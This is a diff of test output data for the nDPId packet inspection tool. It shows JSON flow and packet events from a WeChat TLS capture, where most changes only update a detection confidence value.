-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -218,83 +218,83 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 